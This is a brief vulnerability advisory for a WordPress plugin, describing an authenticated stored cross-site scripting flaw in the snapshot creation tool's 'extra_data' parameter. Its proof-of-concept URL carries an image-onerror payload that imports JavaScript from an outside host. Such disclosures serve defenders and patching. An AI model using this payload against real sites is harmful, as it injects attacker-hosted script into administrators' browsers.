The plugin did not sanitise or escape its extra_data parameter when creating a snapshot via the admin dashboard, leading to an authenticated Stored Cross-Site Scripting issue
PoC | Authenticated Persistent XSS | Enter snapshot name or brief description: https://example.com/wp-admin/admin-ajax.php?action=wp_reset_run_tool&_ajax_nonce=394f497fd0&tool;=create_snapshot&extra;_data=<img src%3Dx onerror%3D%3Bimport(`%2F%2Fm0ze.ru%2Fpayload%2Fa.js`)%3B %2F%2F>